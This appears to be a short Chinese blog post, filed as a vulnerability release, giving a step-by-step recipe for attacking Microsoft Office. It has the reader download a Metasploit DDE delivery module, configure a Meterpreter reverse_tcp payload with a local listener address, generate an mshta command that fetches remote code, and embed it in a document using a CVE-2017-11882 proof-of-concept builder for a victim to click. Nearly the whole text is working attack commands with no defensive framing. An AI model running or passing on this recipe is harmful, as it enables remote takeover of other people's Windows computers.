Oiffce漏洞测试

in 漏洞发布 with 0 comment

先下载脚本
https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
mv 到 /usr/share/metasploit-framework/modules/exploits/windows
然后进Msf,进行操作search dde_delivery.rb
use exploit/windows/dde_delivery.rb
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.30.129
set lport 3333
set URIPATH abc
Exploit
请输入图片描述
拿出mshta http://192.168.30.129:8080/abc
利用https://github.com/Ridter/CVE-2017-11882/ 生成POC
请输入图片描述
然后 你懂吧 点击!!
请输入图片描述

Responses